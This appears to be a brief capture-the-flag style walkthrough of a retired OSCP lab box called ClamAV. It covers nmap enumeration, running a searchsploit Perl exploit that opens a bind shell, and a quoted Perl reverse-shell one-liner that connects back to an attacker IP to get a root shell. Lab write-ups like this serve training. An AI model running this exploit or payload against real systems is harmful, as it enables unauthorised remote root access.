🐧ClamAV

Retired OSCP box

IP : 192.168.90.42

Enumeration

Nmap scan

nmap -sV -p- 192.168.90.42 -A

Port 80

Translated binary to ascii text.

Port 25

No versions seem to coincide with this version. But there is one that gives it away. I mean the name of the box is ClamAV. Its worth a shot.

Copied the module to my working folder and ran it.

searchsploit -m multiple/remote/4761.pl

Read the code and it takes the IP as an argument.

perl 4761.pl 192.168.90.42

It looks like it may create a bind shell. Ran an nmap scan again. Indeed, it did open a port.

Tried connecting with nc. If I'm able to get a full shell it seems I'll land at root.

It seems to only be letting me send one command at a time before it stops responding. Set up nc listener. Tried to send a bash shell but get an error "No such file or directory".

Trying Perl. Since a perl exploit worked on the machine. Thank you revshells.com

perl -e 'use Socket;$i="192.168.49.90";$p=6698;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'

Root

PreviousWheels NextSquid

Last updated 2 years ago

Was this helpful?